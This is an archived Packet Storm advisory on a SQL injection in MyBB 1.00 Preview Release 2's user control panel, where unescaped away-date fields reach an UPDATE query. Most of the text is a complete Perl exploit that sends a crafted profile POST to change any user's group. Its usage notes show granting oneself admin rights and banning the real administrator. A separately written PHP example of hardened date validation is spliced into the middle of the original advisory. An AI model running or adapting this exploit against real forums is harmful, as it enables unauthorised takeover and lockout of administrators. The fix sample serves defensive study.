mybbpr2.pl.txt

2005-10-27T00:00:00
ID PACKETSTORM:41001
Type packetstorm
Reporter cOre
Modified 2005-10-27T00:00:00

Description

`Vendor: www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and maybe prior.
Script: usercp.php
Code:
> if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != "no")
> {
> [...]
> $returndate = $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
> [...]
> $newprofile = array(
> "website" => addslashes(htmlspecialchars($mybb->input['website'])),
> "icq" => intval($mybb->input['icq']),
> "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
> "yahoo" => addslashes(htmlspecialchars($mybb->input['yahoo'])),
> "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
> "birthday" => $bday,
> "away" => $away,
> "awaydate" => $awaydate,
> "returndate" => $returndate, // <--- not checked (bday too, but anyway)
> "awayreason" => addslashes(htmlspecialchars($mybb->input['awayreason']))
> );
> [...]
> $db->update_query(TABLE_PREFIX."users", $newprofile, "uid='".$mybb->user['uid']."'");
So: an attacker can replace the "awayday" parameter with SQL code and change any
field in the _users table, because the three date parts are concatenated into
$returndate without any validation or escaping before update_query() builds the UPDATE.
Changing "usergroup" for his "uid" to 4 makes him an admin. To use
this bug the attacker has to be a registered / awaiting-activation user.
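As an added illustration (not MyBB's own code or its later fix), here is a hardened way to build the returndate value in plain PHP 7+: each date component is coerced with intval() and the triple is validated with checkdate(), so the quote and comment characters the payload relies on never reach the query. The input array and the sample requests are constructed for the example.

```php
<?php
// Added example, not MyBB code: hardened construction of the "returndate"
// value from the awayday/awaymonth/awayyear request fields.
// The vulnerable code concatenated the three raw strings and passed the
// result to update_query() unescaped; here every component is forced to
// an integer and the triple is checked to be a real calendar date.

/**
 * Build "d-m-Y" from three request fields.
 * Returns null when the fields do not form a valid date.
 * intval() keeps only a leading integer, so quotes, commas and
 * comment markers in the raw input are dropped before any string
 * that reaches the database is assembled.
 */
function build_return_date(array $input): ?string
{
    $day   = intval($input['awayday']   ?? 0);
    $month = intval($input['awaymonth'] ?? 0);
    $year  = intval($input['awayyear']  ?? 0);

    // checkdate() rejects impossible combinations such as 31-2-2009.
    if (!checkdate($month, $day, $year)) {
        return null;
    }
    return sprintf('%d-%d-%d', $day, $month, $year);
}

// Constructed sample requests: a legitimate away date, a hostile value
// shaped like the advisory's payload, and an impossible date.
$samples = [
    'legitimate' => ['awayday' => '12', 'awaymonth' => '3', 'awayyear' => '2006'],
    'injection'  => ['awayday' => "1-1-2009', usergroup='4' WHERE uid='7' /*",
                     'awaymonth' => '1', 'awayyear' => '2009'],
    'impossible' => ['awayday' => '31', 'awaymonth' => '2', 'awayyear' => '2009'],
];

foreach ($samples as $label => $fields) {
    $date = build_return_date($fields);
    // A null result means the profile update should be refused with an
    // error message instead of being written to the users table.
    printf("%-10s -> %s\n", $label, $date ?? 'rejected');
}
```

The hostile sample collapses to a harmless integer day because intval() stops at the first non-digit, which is the whole point of typing the value before it is ever placed in a query string.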
  
Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

### MyBB Preview Release 2 SQL-Injection PoC ExPlOiT ###
### ------------------------------------------------ ###
### To use this you have to be registered member on ###
### a target. ###
### ------------------------------------------------ ###
### Glossary: ###
### [MYBBUSER] - name of the field in cookie; ###
### [YOUR_ID] - your uid :) ###
### [ID] - victim uid ###
### Available groups: ###
### 1 - Unregistered / Not Logged In ###
### 2 - Registered ###
### 3 - Super Moderators ###
### 4 - Administrators ###
### 5 - Awaiting Activation ###
### 6 - Moderators ###
### 7 - Banned ###
### ------------------------------------------------ ###
### Examples: ###
### 1) TROUBLE --> U need an admin privileges. ###
### USAGE --> mybbpr2.pl -u [MYBBUSER] -i [YOUR_ID] -g 4 server /mybb/ ###
### 2) TROUBLE --> U need to ban real admin. ###
### USAGE --> mybbpr2.pl -u [MYBBUSER] -i [ID] -g 7 server /mybb/ ###

use IO::Socket;

$tmp=0;

# Walk the argument list looking for the -u / -i / -g / -h switches.
while($tmp<@ARGV)
{
    if($ARGV[$tmp] eq "-u")
    {
        $mbuser=$ARGV[$tmp+1];
        $tmp++;
    }
    if($ARGV[$tmp] eq "-i")
    {
        $id=$ARGV[$tmp+1];
        $tmp++;
    }
    if($ARGV[$tmp] eq "-g")
    {
        $ugr=$ARGV[$tmp+1];
        $tmp++;
    }
    if($ARGV[$tmp] eq "-h")
    {
        &f_help();
    }
    $tmp++;
}

# SERVER and PATH are always the last two positional arguments.
$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
    &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target", PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ".length($str)."\n\n$str\n";
while(<$sock>)
{
    if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
# S u B r O u T i N e #
#----------------------------------#


sub f_help()
{
    print q(
Usage: mybbpr2.pl <OPTIONS> SERVER PATH
Options:
-u USERKEY mybbuser field from cookie.
-i UID User's uid. (Change group 4 this user)
-g GROUP New usergroup. (1-7)
-h Displays this help.
);
    exit(-1);
}
#'
sub f_die($)
{
    print "\r\nERROR: $_[0]\r\n";
    exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--
  
Found: 1-3 Sept 2005. Don't remember.
Updated package is available (I hope).

ByE.
`